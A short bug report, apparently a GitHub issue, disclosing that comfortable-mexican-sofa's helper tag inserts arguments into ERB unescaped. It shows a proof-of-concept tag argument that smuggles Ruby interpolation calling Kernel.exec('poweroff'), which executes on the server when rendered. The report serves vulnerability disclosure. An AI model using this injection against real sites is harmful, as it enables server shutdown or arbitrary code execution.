Just noticed that there's no escaping in
https://github.com/comfy/comfortable-mexican-sofa/blob/master/lib/comfortable_mexican_sofa/content/tags/helper.rb#L36

If I write:

cms:helper whitelisted_helper foo#{Kernel.exec('poweroff')}

it'll get turned into

<%= whitelisted_helper("foo#{Kernel.exec('poweroff')}") %>

When ERB interprets this, it'll execute poweroff.